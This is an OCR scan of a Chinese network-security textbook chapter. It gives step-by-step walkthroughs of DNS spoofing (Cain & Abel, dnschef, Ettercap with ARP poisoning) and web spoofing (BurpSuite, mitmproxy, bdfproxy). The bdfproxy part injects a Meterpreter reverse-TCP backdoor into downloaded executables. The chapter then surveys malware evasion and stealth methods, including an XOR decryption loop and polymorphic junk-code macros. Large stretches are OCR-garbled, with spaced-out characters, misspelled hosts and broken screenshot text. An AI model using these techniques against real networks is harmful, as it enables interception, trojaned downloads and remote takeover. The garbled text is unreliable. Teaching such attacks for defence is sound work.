返回 “江西 师范 大 学 新 闻 网 站 ”的 内 容 , 说 明 欺 骗 成 功 。 图 5-26 列 出 了 攻击 时 监听 到 的 
DNS 报 文 序列 ,可 以 清楚 地 看 到 Cain & Abel 将 每 个 正确 的 DNS 应 答 算 改 改 为 虚假 的 
DNS 应 答 ,然后 再 发 送 给 DNS 查询 主机 ,因此 主机 收 到 的 是 错误 的 DNS 应 答 信息 。 

dnschef? 是 一 款 配 置 非常 灵活 .功能 十 分 强大 的 命令 行 式 DNS 代理 程序 , 它 支持 正 
向 和 反 向 过 滤 ,运行 时 实际 上 就 是 一 个 简单 的 DNS 服务 器 。 攻 击 者 只 需要 配置 虚假 的 
A、MX 和 NS 记录 即 可 , 它 只 会 对 符合 记录 的 请 求 响应 虚假 应 答 ,其 他 的 DNS 请 求 则 转 
发 给 真实 的 DNS 服务 器 进行 查询 。 它 使 用 Python 编写 ,可 以 运行 在 任何 系统 平台 。 要 


DD https://baoz. net/dns-hijack-spoof/ 
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图 5-24 Cain& Abel 实施 DNS 欺骗 


江西 二 葛 大 学 新 闻 网 
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nn 
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© want to clem t up for sfresh, Ske-new erperence? And by the Reset keweasel 


图 5-25 DNS 欺骗 结果 


Ox7b53 A www.baidu. com 

OxB140 AAAA www. baidu. com 

Ox7b53 A waw. baidu. com 

OxB140 AAAA www. baidu. com 

response Ox7b53 A www.baidu. com CNAME www.a.shifen.com A 1 aa 
response 0x8140 AAAA www.baidu. com CNAME ww.a.Shifen. cg 

response Ox7b53 A www. baidu. com CNAME www.a.shifen. com 
response 0x8140 AAAA www.baidu. com CNAME www.a.shifen. com TFen.« 
Oxec32 A waw. baidu. com 

Oxec32 A ww. baidu. com 


response Oxec32 A wnw.baidu. com CNAME www.a.shifen. com 4 
response Oxec32 A www.baidu. com CNAME www.a.shifen. com| 1 


图 5-26 ”DNS 欺骗 攻击 时 的 报 文 序列 
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使 用 dnschef 进行 DNS 欺骗 ,需要 满足 : D DNS 请 求 报 文 必须 经 过 dnschef 主机 ; 
Ddnschef 主机 必须 具备 报 文 转发 功能 ,而 且 要 把 请 求 报 文 转发 至 dnschef 的 运 
在 Linux 用 dnschef 实现 DNS 欺骗 的 示例 如 图 5-27 所 示 。 首 先 开启 Linux 主机 的 转发 
功能 ,然后 利用 iptables 提供 的 端口 转发 功能 ,把 所 有 截获 到 的 DNS 请 求 报 文 都 转发 至 
本 机 的 UDP 53 号 端口 。 接 着 ,使 用 arpspoof 工具 对 主机 “192. 168. 24. 136” 与 网 关 
“192. 168. 24. 2” 之 间 的 通信 进行 ARP 欺骗 ,截获 双向 通信 报 文 。 接 着 执行 dnschef 程 
序 , 设 置 虚假 域名 为 “www. baidu. com”, 虚 假 IP 为 “202. 101. 194. 153”, 真实 DNS 服务 
器 为 “202. 101. 224. 69”, 设 置 监听 的 接口 为 指定 的 IP 地 址 ,可 以 看 到 对 IP 为 *192. 168. 
24.136” 的 主机 发 送 了 一 个 虚假 的 DNS 应 答 。 图 5-28 首先 使 用 “ipconfig/flushdns” 清 除 
本 地 缓存 ,然后 访问 “www. baidu. com”, 可 以 看 到 收 到 了 错误 的 DNS 应 答 信 
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图 5-27 dnschef 实施 DNS 欺骗 





图 5-28 DNS 欺骗 192. 168. 24. 136 成 功 


Ettercap? 是 一 款 在 MITM 攻击 中 广泛 使 用 的 工具 , 它 与 Cain & Abel 功能 类 似 , 但 
是 通常 只 在 Linux/UNIX 平台 下 运行 。 它 不 仅 有 强大 的 嗅 探 功能 ,支持 5. 2. 1 节 描 述 的 
多 种 局 域 网 欺骗 方法 ,还 提供 了 许多 MITM 攻击 插件 ,也 包括 DNS 欺骗 。Ettercap 进行 
DNS 欺骗 的 前 提 与 dnschef 相同 ,必须 使 DNS 报 文 转发 至 Ettercap 运行 的 主机 和 端口 ， 
然后 使 用 Ettercap 进行 DNS 欺骗 的 步骤 如 下 : 

Q@ 开启 嗅 探 模式 ,扫描 发 现 局 域 网 内 主机 (图 5-29); 

@ 选择 需要 截获 数据 的 双向 通信 主机 (图 5-30); 


® http://ettercap. github. io/ettercap/about. html。 
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图 5-30 ”Ettercap 设置 需要 攻击 的 双向 主机 
@ 编辑 虚假 主机 和 IP 的 映射 关系 (/etc/ettercap/ettercap. dns 配置 文件 )( 图 5-32); 
@ 激活 DNS 欺骗 插件 (图 5-31)。 


Start Targets Host View Mm Filtars Loggng Pugn St Toyets Hews Vew Man Fe toggng Pye we 


Host Uist « Host Last » 


Start Targets Hosts View Mitm Fiters Logging Plugns 
Heseuse sj] Pgne ~ 

PAddress MAC Adde 
192.168241 00:50:56¢ 
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图 5-31 Ettercap 开启 ARP 欺骗 攻击 并 激活 DNS 欺骗 插件 


Fle Ett View Seach Tamial Hep 


图 5-32 虚假 IP 映射 配置 文件 
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图 5-33 和 图 5-34 分 别 指 明 Ettercap 欺骗 成 功 的 效果 以 及 Ettercap 欺骗 成 功 的 日 志 
信息 。 





:VDocuments and Settings\Administrator)ping ww. baidu com 
inging ww. baidu. com [202.101.194.153] with 32 bytes of data: ARP poisoning victims 
ontrol-C 
四 GROUP 1 : 192.168.24.136 00:0C:29:D8:27:8D 
:VDocuments and Settings\Administrator)ping wm. microsoft. com 
GROUP 2 : 192.168.24.2 00:50:56:EA:19:4C 
inging www, microsoft. com [107.170. 40. 56] with 32 bytes of data Activating dns_spoof Plugin 
dns_spoof: A [www.baidu.com] spoofed to [202.101.194.153] 
dns_spoof A [www.microsoft.com] spoofed to [107.170.40.56] 





ontrol 
Tc 





图 5-33 ”Ettercap 欺骗 效果 图 5-34 ”Ettercap 的 欺骗 记录 


DNS 欺骗 的 主要 原因 还 是 在 于 DNS 应 答 消 息 都 是 明文 发 送 ,攻击 者 可 以 随意 伪 
造 和 修改 ,由 于 无 法 对 消息 进行 任何 验证 ,同时 也 无 法 认证 消息 是 否 确实 从 DNS 服务 
器 发 出 ,所 以 主机 根本 无 法 识别 一 个 DNS 应 答 是 否 正 确 。 主 要 防御 办 法 包括 以 下 
儿 种 : 

(1) 建立 白 名 单 ,为 经 常 访问 的 域名 地 址 建立 一 个 主机 和 IP 地 址 映射 的 白 名 单 , 存 
放 在 Hosts 文件 中 ,DNS 解析 优先 查询 Hosts 文件 。 

(2) 直接 用 IP 地 址 访问 重要 服务 器 ,但 是 有 些 服 务 站 点 配置 虚拟 主机 ,会 拒绝 直接 
访问 IP 地址。 

(3) 应 用 加 密 通信 ,如 Web 服务 使 用 HTTPS 协议 、 远 程 访问 使 用 SSH 协议 等 ,使 用 
基于 SSL 的 协议 收发 数据 和 邮件 等 ,这 样 即使 访问 了 虚假 的 地 址 ,由 于 对 方 无 法 解密 通 
信 数 据 , 也 不 会 造成 很 大 危害 。 

2. Web 欺骗 

Web 欺骗 是 攻击 者 在 目标 主机 和 服务 器 之 间 搭 建 Web 代理 服务 器 ,在 截获 双向 通 
信 数 据 的 基础 上 ,制造 虚假 的 页 面 (虚假 的 连接 、 表 单 、 脚 本 ) 或 恶意 的 代码 等 使 得 目标 主 
机 接收 虚假 信息 ,执行 攻击 者 期 望 的 动作 。 有 许多 代理 服务 工具 专门 用 于 页 面 修改 ,如 
BuprsuiteD .OWASP Zap 和 mitmproxy@ 等 ,使 用 这 些 工 具 可 以 轻松 地 对 截获 的 网 页 进 
行 任何 修改 。 有 的 工具 如 bdfproxy 可 以 直接 将 目标 主机 通过 Web 远程 下 载 的 合法 程序 
或 工具 修改 为 恶意 代码 ,从 而 隐蔽 地 将 恶意 代码 提供 给 目标 主机 。 

1) BurpSuite 

BurpSuite 是 用 于 攻击 Web 应 用 程序 的 集成 平台 , 它 包括 一 个 拦截 HTTP/HTTPS 
的 代理 服务 器 组 件 ,允许 攻击 者 拦截 .查看 和 修改 原始 HTTP 报 文 。 图 5-35 列 出 了 设置 
代理 的 方式 ,BurpSuite 实现 Web 欺骗 必须 配置 透明 代理 ,否则 它 会 通知 目标 主机 设置 代 
理 , 无 法 实现 欺骗 效果 。 示 例 中 将 代理 设置 为 80 端口 ,同时 打开 透明 代理 选项 (support 
invisible proxy)。 图 5-36 配置 BurpSuite 仅仅 拦截 包含 “www. jxnu. edu. cn” 的 URL 地 
址 并 且 不 包括 图 片 .CSS 文件 和 JS 文件 等 , 即 只 拦截 Web 页 面 的 HTML 请 求 和 HTML 


®O http://baike. baidu. com/item/burpsuite 
©® https://mitmproxy. org/doc/mitmproxy. html 
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应 答 。 图 5-37 显示 了 拦截 的 HTTP 应 答 内 容 , 即 为 “www. jxnu. edu. cn” 主 页 的 内 容 , 示 
例 将 一 条 新 闻 的 题目 改 为 “hello you are hacked”, 然 后 forward” 给 目标 主机 。 图 5-38 显 
示 了 使 用 BurpSuite 欺骗 前 后 显示 的 不 同 页 面 内 容 。 


Bp rtruder Repester Wrdom Hep 
Target Spider | scanner | Intruder | Repeater | Sequencer [ Decoder | Comparer | Extender | Opti 








Intercept | HTTP history | websockets history 





图 Proxy Listeners 
图 Burp Proxy uses listeners to receive incorning HTTP requests from your browser. You will need to configure your 














国 These settings control whether Burp redrects requests receiv 


Each nstallation of Burp generates ts own CA Redrect to host: 
— Redrect to port 


Force use of ssL 


图 Intercept Client Requests Invisble proxy support sloms no-proxy-anare clientstoc 


Usethese settings to control which requests 
a Support invisible proxying (enable only if needed) 


图 5-35 ”透明 代理 设置 





[seeert [ HrrP history | websocets history [eng 


园 “Use these settings to control which requests are staled for viewing and editing in the intercept tab. 





国 Intercept requests based on the folomng rules 














Automaticaly fix missing or superfiuous new ines wt end of reauest 
回 Autormaticaly update Content-Length header when the request s edted 





图 Intercept Server Responses 
@ Vethese settings to cortrol mhich responses are staled for vianing and edting in the Intercept tab. 





国 Intercept responses based on the folowing rules: 











5-36 ”拦截 过 滤器 设置 


2) mitmproxy 

mitmproxy 是 一 款 纯 命 令 式 、 专 用 于 中 间 人 攻击 的 代理 工具 ,功能 不 亚 于 BurpSuite， 
其 命令 行 形式 更 有 利于 隐 项 攻击 。 图 5-39 给 出 了 在 80 端口 开启 透明 代理 的 命令 行 ; 
图 5-40 给 出 了 拦截 到 访问 主机 “202. 101. 194. 153” 的 返回 页 面 , 它 使 用 正则 表达 式 过 滤 
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图 5-38 ” 算 改 页 面前 后 访问 www. jxnu. edu. cn 的 结果 比较 


需要 显示 (命令 1) 和 需要 拦截 (命令 门 的 URL 地 址 ,图 中 的 过 滤器 表明 只 显示 和 拦截 包 
含 “202. 101. 194. 153” 的 html 页 面 ,键入 “e” 即 可 准备 编辑 页 面 ,接着 输入 “r” 即 开始 进入 
页 面 编辑 界面 ,可 以 随意 修改 网 页 ,修改 完成 并 返回 后 ,键入 *a" 或 者 *A” 即 可 返回 修改 后 
的 页 面 给 目标 主机 。mitmproxy 的 具体 命令 可 查看 在 线 帮助 或 者 其 官方 网 站 。 

3) bdfproxy 

bdfproxy 又 名 后 门 工厂 代理 ,是 一 款 将 
后 门 程序 (backdoorfactory ) 与 mitmproxy 
相 结合 的 工具 , 它 在 MITM 欺骗 已 经 截获 双 
向 通信 的 前 提 下 ,监听 目标 的 请 求 和 应 答 ， 
当 发 现 目标 在 远程 下 载 可 执行 程序 时 , 它 会 
接管 下 载 过 程 ,注入 后 门 程序 ,然后 返回 给 
目标 ,而 目标 毫 无 察觉 。 当 目标 执行 该 程序 





时 ,其 实 执行 的 是 攻击 者 放置 的 后 门 程序 。 图 5-39 ”mitmproxy 命令 行 启动 透明 代理 
使 用 bdfproxy 进行 代码 攻击 的 步 





又 如 下 : 
名 双向 通信 截获 ,与 其 他 MITM 攻击 相同 。 
@ 配置 “/usr/share/bdfproxy/bdfproxy. cfg” 文 件 , 设 置 透明 代理 的 端口 以 及 如 何 注 
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2617-64-26 01:59:16 


/htmU] [ 





图 5-40 ”拦截 响应 示例 


人 恶意 代码 (图 5-41) 。 


人 恶意 


bdfproxy.cfg 
Jusr/share/bdfproxy 









PORT = 8088 
SHELL = reverse tcp_stager_threaded 后 门 服务 的 监听 地 址 
和 端口 号 以 及 恶意 代 


False 
码 的 名 称 


True 


ZERO_CERT 
windows/meterpreter/reverse_tchl| 


PATCH_DLL 
MSFPAYLOAD 


透明 代理 
# Modes: None, socks5, 
8999ggb # will send a 502 request of large col 


gproxy/mitmproxy-ca.pem 


transparent，re) 





ProxyBort = = 全 
sslports = 


resourceScript = bdfproxy_msf_resource.rcl 生成 的 msf 命 令 秆 本 


图 5-41 bdfproxy 配置 文件 





启动 bdfproxy( 图 5-43) ,命令 如 下 ; 


bdfproxy 


启动 msfconsole 程序 开启 后 门 服务 程序 并 在 配置 端口 监听 ,命令 脚本 如 图 5- 


a 。 
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msfconsole —r /usr/share/bdfproxy/bdfproxy msf_resource.rc 

@@ 等 待 目 标 下 载 可 执行 程序 ,将 恶意 代码 注入 该 可 执行 程 

@ 目标 执行 恶意 代码 ,自动 连接 后 门 服务 程序 , 即 可 远程 控制 目标 (图 5-45)。 

图 5-42 显示 当 目 标 试图 远程 下 载 “Putty_0. 67. 0. 0. exe” 时 ,bdfproxy 注入 一 个 新 的 
代码 节 (section) 给 该 程序 ,然后 再 把 修改 后 的 程序 转发 给 目标 。 当 目标 执行 该 程序 时 ， 
图 5-45 显示 有 主机 连接 本 地 的 8088 端口 ,并 开启 了 一 个 命令 行 形式 的 远程 控制 会 话 





(Meterpreter S' 


[*] 
[*] PATH: /sw- PuTTY_ 9 
esse END 


2/PuTTY 9 
,pported 


ruction: 


le injection 


ting win3 
Looking ff 
Patching 





7 
_runr | the[.]midnite) .(runr<at>gmaiL| .|com 
node #BDFactory 





图 5-43 启动 bdfproxy 





图 5-44 msfconsole 的 命令 脚本 示例 





图 5-45 目标 主机 连接 攻击 者 的 后 门 服务 示例 
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5.3 恶意 代码 


早期 恶意 代码 的 主要 形式 是 计算 机 病毒 ,只 要 程序 具有 破坏 、 传 染 或 模仿 的 特点 ,就 
可 以 认为 是 计算 机 病毒 。 现 在 ,一 般 将 恶意 代码 定义 为 经 过 存储 介质 和 网 络 进行 传播 ,未 
经 授权 破坏 计算 机 系统 完整 性 的 程序 或 代码 。 亚 意 代码 主要 包括 病毒 .蠕虫 .木马 .好 辑 

















炸弹 、 恶 意 脚本 和 Rootkits 等 ,它们 的 分 类 和 定义 如 表 5-1 所 示 。 
表 5-1 恶意 代码 的 分 类 和 描述 

分 类 描 述 特 ”点 
病毒 破坏 计算 机 功能 或 毁坏 数据 ,并 能 自我 复制 的 代码 潜伏 ,传染 和 破坏 
蠕虫 通过 网 络 自我 复制 \ 消 耗 系统 和 网 络 资源 的 代码 扫描 、 攻 击 和 传染 
木马 与 远程 主机 建立 连接 ,使 本 地 主机 接受 远 端 控制 的 代码 欺骗 .隐蔽 和 控制 
逻辑 炸弹 ”| 以 特定 条 件 触 发 ,破坏 系统 和 数据 的 代码 潜伏 和 破坏 
Rootkits 嵌入 系统 内 核 或 系统 程序 以 实现 隐藏 或 建立 后 门 的 代码 潜伏 和 隐蔽 











恶意 代码 的 攻击 过 程 大 致 分 为 入侵 系统 、 提 升 权 限 、 隐 项 自己 ,实施 攻击 等 几 个 过 程 。 
一 段 成 功 的 恶意 代码 必须 首先 具有 良好 的 隐蔽 性 和 生存 性 ,不 能 轻易 被 防御 工具 察觉 , 然 
后 才 是 良好 的 攻击 能 力 。 


5.3.1 生存 技术 


生存 技术 主要 包括 反 调试 .压缩 技术 .加 密 技 术 、 多 态 技术 (polymorphism) 和 变形 技 
术 (metamorphism) 等 。 

1. 反 调 试 技术 

恶意 代码 采用 反 调试 技术 可 以 增加 分 析 工 具 对 其 检测 和 清除 的 难度 ,并 提高 自身 的 
伪装 能 力 。 它 可 以 监视 自己 的 代码 执行 并 检测 当前 的 运行 环境 以 判定 自己 是 否 正 在 被 调 
试 ,从 而 执行 不 同 的 操作 ,以 逃避 分 析 , 主 要 方法 包括 : 

(1) 查找 指令 操作 码 0xcc, 调 试 器 通常 使 用 该 指令 在 断 点 处 取得 恶意 软件 的 控制 权 。 

(2) 计算 恶意 代码 自身 的 校 验 和 ,如 果 校 验 和 发 生变 化 ,那么 可 以 确定 正在 被 调试 ， 
并 且 其 代码 内 部 已 被 放置 断 点 。 

(3) 在 Linux 系统 上 检测 调试 器 只 要 调用 Ptrace 即 可 ,因为 一 个 进程 无 法 连续 调用 
Ptrace 两 次 。 

(4) 在 Windows 系统 上 如 果 程 序 处 于 调试 状态 ,系统 调用 isDebuggerPresent 将 返 
回 1 ,和 否则 返回 0, 也 可 以 使 用 NtQueryInformationProcess 。 

(5) 观察 程序 运行 的 速度 是 否 显著 放 缓 ,判定 是 否 正在 被 单 步 跟 踪 。 

(6) 进行 指令 预 取 ,检测 下 一 步 执行 的 指令 是 否 与 提前 预 取 的 指令 一 致 ,如 果 有 调试 
器 ,那么 指令 不 可 能 一 致 。 

(7) 代码 自修 改 , 使 调试 器 在 单 步 跟踪 时 分 析 的 是 经 过 修改 后 的 代码 。 

(8) 其 他 检测 调试 器 的 方法 ,如 检查 设备 列表 是 否 含有 调试 器 的 名 称 ,检查 是 否 存 在 
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用 于 调试 器 的 注册 表 键 ,扫描 内 存 检查 是 否 含有 调试 器 的 代码 等 

(9) 禁止 键盘 输入 和 封锁 屏幕 显示 ,破坏 调试 工具 的 动 3 环境 。 

(10) 垃圾 指令 法 ,在 指令 流 中 插入 无 用 指令 ,使 静态 反 汇 编 无 法 得 到 全 部 正常 的 指 
令 , 无 法 有 效 地 进行 静态 分 析 。 

2. 压缩 技术 

压缩 技术 俗称 "压缩 加 壳 ”, 它 是 利用 特殊 的 算法 ,对 可 执行 文件 里 的 资源 进行 压缩 ， 
百 的 文件 可 以 独立 运行 ,解压 过 程 在 内 存 中 完成 。 碗 附加 在 原始 程序 上 通过 加 载 器 
载 人 内 存 后 , 先 于 原始 程序 执行 并 得 到 控制 权 , 在 壳 的 执行 过 程 中 对 原始 程序 进行 解压 、 
还 原 ,还 原 完成 后 再 把 控制 权 交 还 给 原始 程序 ,执行 原来 的 代码 。 加 上 外 壳 后 ,原始 程序 
代码 在 磁盘 文件 中 以 压缩 数据 形式 存在 ,只 在 外 过 执行 时 在 内 存 中 将 原始 程序 解压 并 运 
行 ,这 样 有 效 地 防止 程序 被 静态 反 编 译 

压缩 技术 的 代表 性 工具 是 upx, 在 图 5-46 中 , 它 把 pwdump7. exe 压 
47. 37% ,生成 的 testl. exe 与 原 有 程序 功能 相同 























用 为 原来 的 


hacked 1 41 
p:、- 录 第 恶 章 代码 攻击 wpx392vyair 
庄 dd \ 温 五 章 \ 恶 章 代 码 攻击 wpx392v>ad 

的 序列 号 是 28aE-p2eE 
D:\ 工 作 目 录 \ 网 络 安全 技术 〈 写 书 ) \ 第 五 章 \ 恶 瘟 代 码 攻 击 upx392w 的 目录 


和 :工作 目录 \ 网 络 安全 技术 【〈 写 书 ) “第 五 章 \ 恶 意 代 码 攻击 \apx3?2v>- 





图 5-46 upx 用 法 示例 


@ http://baike. baidu. com/item/upx, 一 般 用 于 压缩 命令 行程 序 , 压 缩 GUI 程序 容易 出 错 。 
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3. 加 密 技 术 


加 密 技 术 是 恶意 代码 自我 保护 的 主流 手段 ,将 它 与 反 调试 技术 配合 ,使 得 安全 人 员 无 
法 正常 调试 和 分 析 恶 意 代码 ,从 而 无 法 知道 其 工作 原理 ,也 无 法 抽取 特征 代码 。 目 前 ,加 
密 技术 主要 分 为 数据 加 密 和 程序 代码 加 密 。 为 了 防止 被 调试 器 解 开 密 文 ,攻击 者 也 想 出 
了 很 多 办 法 ,有 的 解密 依赖 于 特定 执行 路 径 、 有 的 使 用 堆栈 解密 有 的 使 用 解码 器 的 代码 
校 验 和 作为 密 钥 。 下 列 代码 片段 给 出 了 一 个 简单 的 代码 加 密 框架 : 
MOV ECX, VIRUS_SIZE 
MOV EDI, offset EncryptStart 
DecrptLoop: 
XOR byte ptr [EDI], key 
INC EDI 
LOOP DecrptLoop 
其 中 ,“VIRUS_SIZE” 是 加 密 代码 的 长 度 , “offset EncrptStart” 是 加 密 代 码 的 起 始 地 址 ， 
“key” 是 密 钥 。 只 要 每 次 的 “key” 不 同 ,那么 产生 的 加 密 代码 的 特征 值 就 不 同 。 这 个 简单 
框架 的 问题 是 这 段 框架 代码 固定 不 变 ,存在 固有 特征 。 改 进 方法 就 是 使 每 次 生成 的 解密 
头 和 密 钥 都 不 同 。 加 密 技术 应 该 达到 如 下 目标 : 
(1) 每 条 解密 指令 都 不 固定 ,上 述 框 架 代码 实际 上 只 是 若干 种 实现 方式 的 其 中 一 种 
(多 态 技 术 ,polymorphism)。 
(2) 密 钥 每 次 都 随机 生成 。 
(3) 加 密 和 解密 算法 可 随机 选择 。 
因为 解密 代码 几乎 没有 规律 可 循 ,而 其 他 代码 又 经 过 加 密 , 所 以 整 段 恶意 代码 都 不 会 
固定 不 变 , 安 全 软件 很 难 从 这 些 代码 中 找到 固定 不 变 的 特征 码 。 
4. 多 态 技术 
多 态 变 换 俗 称 花 指令 或 模糊 变换 , 即 用 不 同 的 方式 实现 同样 功能 的 代码 ,主要 有 如 下 
方法 : 
(1) 指令 蔡 换 。 解 析 每 条 指令 的 语义 并 计算 长 度 ,对 指令 进行 相同 长 度 的 指令 替换 
并 保持 语义 ,如 “xor eax,eax” 语 义 等 价 于 “sub eax,eax”。 
(2) 寄存 器 变换 。 为 指令 随机 选择 指定 通用 寄存 器 ,而 不 改变 指令 的 语义 ,如 “mov 
ebx,[1234]; mov [4567] ,ebx” 等 价 蔡 换 为 “mov eax,[1234]; mov [4567] ,eax”。 
(3) 位 置 替 换 。 有 些 指令 序列 可 交换 顺序 ,并 且 保 持 语义 不 变 , 这 时 可 以 打 乱 指令 顺 
序 执行 ,如 “mov ebx,23; xorecx,ecx” 和 “xor ecx,ecx;mov ebx,23? 语 义 相同 。 
(4) 指令 压缩 。 解 析 某 段 指令 的 全 部 语义 ,对 其 进行 压缩 并 保持 相同 语义 ,如 “mov 
eax,12345678; push eax” 可 压缩 为 “push 12345678”。 
(5) 指令 扩展 。 解 析 每 条 指令 的 语义 并 将 其 扩充 为 若干 条 指令 且 语 义 等 价 , 它 是 指 
令 压 缩 的 逆 变 换 , 它 的 变换 空间 要 比 压缩 技术 大 得 多 ,有 时 可 以 有 多 达 上 百 种 的 扩展 变 
换 , 如 “push 12345678” 扩 展 为 “mov eax,12345678; push eax”。 
(6) 垃圾 指令 。 垃 圾 指令 是 不 影响 代码 执行 效果 的 指令 ,可 以 有 单字 节 、 双 字 节 等 垃 
圾 指令 ,使 得 安全 软件 难以 产生 有 效 的 特征 码 。 下 列 代码 序列 定义 了 一 条 制造 垃圾 指令 


《ED 
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同时 执行 指定 指令 的 宏 指 令 ,使 得 上 述 加 密 框 架 代 码 发 生 了 一 定 的 变化 : 





;定义 宏 ,执行 一 条 有 效 指令 的 同时 制造 垃圾 代码 
I3 macro codel 2,code3 
local s,e 

















I3 MOV ECX, VIRUS_SIZE 
13 MOV EDI, offset EncryptStart 
,offset Encr ar| 
e: db INSTRLEN - (es) dup (90h) ;垃圾 代码 i 
DecrptLoop: 
CE I3 XOR byte ptr [EDI] ,ke 
I2 macro codel 2 yte p ey 
一 I2 INC EDI 
local s,e 
I2 LOOP DecrptLoop 
s: codel 2 
e: db INSTRLEN-(e-s) dup (90h) 
endm 











代码 会 综合 应 用 这 些 多 态 技术 ,也 有 不 少 自动 攻击 工具 提供 多 态 引 擎 组 件 ， 
如 Metasploit 平台 提供 的 msfvenom 工具 ,可 以 对 原始 代码 的 解密 代码 部 分 展开 多 态 变 
换 , 从 而 提高 代码 的 生存 率 。 一 般 的 多 态 引 擎 进行 变换 的 方式 如 图 5-47 所 示 。 





=| 指令 扩展 1 





垃圾 指令 
插入 


























指令 替换 | 一 

















一 | 指令 收缩 











图 5-47 多 态 引擎 的 组 合 变换 方式 


msfvenom 提供 了 不 同 平台 的 垃圾 指令 生成 器 (NOPS) 如 “x86/opty2” 和 “x86/ 
single”, 不 同 平台 的 多 态 指 令 全 成 器 (Encoders) 如 “x86/call4_dword_xor”, 攻 击 者 可 以 
组 合 多 种 不 同 的 生成 吕 产 : 生 多 态 代 码 。 如 图 5-48 所 示 , 对 路 径 为 “linux/x86/sheel/bind_ 





图 5-48 生成 C 格式 的 多 态 恶意 代码 
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tcp” 的 原始 恶意 代码 进行 多 态 变化 ,输出 C 语言 格式 的 多 态 代码 ,应 用 了 上 述 “x86/call_ 
dword_xor” 多 态 指令 生成 器 和 “x86/single_byte” 垃 圾 指令 生成 器 。 

5. 变形 技术 

变形 技术 (metamorphism) 在 多 态 变 换 的 基础 上 更 进一步 , 它 针对 整个 恶意 代码 程序 
而 不 是 其 中 一 段 或 几 段 代码 进行 处 理 。 经 过 变形 的 代码 与 原始 代码 完全 不 同 ,而 且 也 不 
存在 特定 的 加 密 和 解密 代码 段 ,使 得 安全 人 员 几 乎 不 可 能 从 变形 代码 中 抽取 出 固定 的 特 
征 码 。 变 形 技术 的 实现 原理 如 图 5-49 所 示 。 首 先 需 要 将 原始 代码 反 汇 编 为 一 种 中 间 代 
码 , 然 后 采用 多 态 技术 对 其 进行 全 局 变换 ,最 后 再 使 用 中 间 代 码 的 汇编 器 将 其 重新 编译 成 
可 执行 代码 。 由 于 涉及 全 局 变换 和 机 器 指令 的 优化 问题 ,变形 技术 的 实现 难度 很 大 ,调试 
十 分 困难 ,因此 变形 引擎 相对 较为 少见 。 
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图 5-49 ”变形 技术 的 实现 原理 
5.3.2 隐蔽 技术 


在 恶意 代码 成 功 躲 避 安 全 软件 的 扫描 和 检测 后 , 它 不 希望 在 执行 时 被 安全 人 员 察觉 ， 
例如 管理 员 会 经 常 使 用 Windows 的 任务 管理 器 (taskmgr. exe) 或 Linux 的 ps 和 top 命 
令 检 查 当 前 正在 执行 哪些 程序 ,使 用 “netstat -ano” 查 看 当前 的 网 络 连接 状况 。 它 也 不 希 
望 在 与 攻击 者 进行 通信 时 被 防火 墙 阻挡 , 当 它 被 发 现时 , 它 不 希望 被 管理 员 轻 易 地 终止 执 
行 。 攻 击 者 针对 这 些 常 见 的 需求 开发 的 隐蔽 技术 包括 进程 注入 、 三 线程 .端口 复 用 、 端 口 
反 向 连接 和 文件 隐藏 技术 等 。 

1. 进程 注入 

操作 系统 必须 运行 许多 系统 和 网 络 服务 进程 ,它们 在 系统 启动 时 自动 加 载 。 恶 意 代码 
往往 以 上 述 程序 的 可 执行 代码 作为 载体 ,将 自身 注入 其 中 ,从 而 实现 隐蔽 执行 的 目标 ,并 且 
可 以 确保 在 系统 运行 时 自身 始终 保持 激活 状态 。 典 入 的 方式 为 将 自身 代码 写 信 目标 进程 的 
虚拟 内 存 地 址 空间 ,Windows 可 以 调用 WriteProcessMemory 和 CreateRemoteThread 等 
系统 API 实现 9 。 

2. 三 线程 

一 个 进程 可 以 同时 拥有 多 个 并 发 线程 。 所 谓 三 线程 就 是 指 恶 意 代 码 同 时 开启 三 个 线 
程 ,其 中 主线 程 负责 具体 的 功能 实现 ,另外 两 个 分 别 是 监视 线程 和 守护 线程 。 监 视线 程 时 
刻 检 查 恶 意 代码 的 状态 ,而 守护 线程 用 于 注入 其 他 可 执行 代码 。 它 们 与 主线 程 同步 ,一 旦 
恶意 代码 主线 程 被 管理 员 停止 执行 ,监视 线程 会 立即 发 现 并 通知 守护 线程 重新 启动 主线 
程 ,从 而 保证 执行 的 持续 性 。 


@ http://www. wenkuxiazai. com/doc/a2561bf49e3143323968932c-3. html 





Sm 网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 


3. 端口 复 用 

端口 复 用 指 利用 系统 已 打开 的 某 个 服务 端口 与 外 界 进行 通信 下 ,从 而 可 以 躲避 防火 
墙 的 阻拦 。 如 果 服 务 程序 在 建立 套 接 字 时 没有 使 用 "SO_EXCLUSIVEADDRUSE”? 选 项 
要 求 独占 该 端口 ,那么 攻击 者 可 以 使 用 setsockopt 函数 中 的 “SO_REUSEADDR” 选 项 在 该 
端口 上 建立 一 个 新 的 套 接 字 进行 监听 ,并 将 收 到 的 报 文 转发 至 本 地 环 回 地 址 ”127. 0. 0. 1” 的 
对 应 端口 ,从 而 不 影响 原 有 服务 的 正常 工作 ,具有 很 强 的 隐蔽 性 。 

4. 端口 反 向 连接 

防火 墙 通常 对 进入 内 网 的 报 文具 有 严格 的 过 滤 策 略 ,但 很 少 检测 从 内 网 发 出 的 报 文 。 
端口 反 向 连接 就 是 利用 防火 墙 配置 的 朴 忽 ,不 是 从 攻击 者 向 目标 主机 发 起 连接 ,而 是 目标 
主机 主动 发 起 向 远 端 控制 者 的 连接 。 反 向 连接 需要 解决 的 主要 问题 是 如 何 准 确 地 定位 远 
程控 制 者 ,因为 攻击 者 的 IP 地 址 不 固定 ,每 次 开机 时 由 ISP 随机 提供 。 

图 5-50 说 明了 端口 反 向 连接 的 基本 原理 ,恶意 代码 从 防火 墙 内 首先 访问 一 个 固定 地 
址 的 Web 服务 器 ,该 服务 器 上 存放 一 份 记录 了 攻击 者 实时 IP 地 址 和 服务 端口 的 数据 文 
件 或 Web 页 面 ,恶意 代码 只 需要 请 求 该 文件 或 页 面 即 可 获得 攻击 者 的 位 置 ,然后 向 攻击 
者 发 起 远程 连接 接口 实现 通信 。 为 了 躲避 防火 墙 检测 ,攻击 者 可 以 把 服务 端口 设置 为 常 
用 的 80 端口 ,这样 防 火 墙 会 误 以 为 恶意 代码 正在 访问 外 部 的 网 站 。 如 果 攻 击 者 采用 正 向 
连接 方式 连接 目标 ,往往 会 被 防火 墙 阻挡 ,因为 它 通常 不 允许 外 部 主机 主动 向 内 网 主机 发 
起 TCP 连接 。 图 5-51 显示 使 用 Msfvenom 分 别 生 成 正 向 连接 恶意 代码 (shell_1) 和 反 向 
